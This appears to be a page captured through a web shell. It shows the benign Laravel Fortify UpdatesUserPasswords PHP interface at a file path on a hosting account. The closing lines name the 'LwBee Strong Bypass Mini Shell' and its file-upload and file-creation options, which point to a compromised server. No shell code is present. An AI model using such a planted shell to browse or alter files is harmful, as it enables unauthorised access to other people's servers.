/home/aloic1/public_html/core/vendor/laravel/fortify/src/Contracts/UpdatesUserPasswords.php
<?php

namespace Laravel\Fortify\Contracts;

interface UpdatesUserPasswords
{
    /**
     * Validate and update the user's password.
     *
     * @param  mixed  $user
     * @param  array  $input
     * @return void
     */
    public function update($user, array $input);
}
@LwBee Strong Bypass

LwBee Strong Bypass Mini Shell

Upload File

Create New File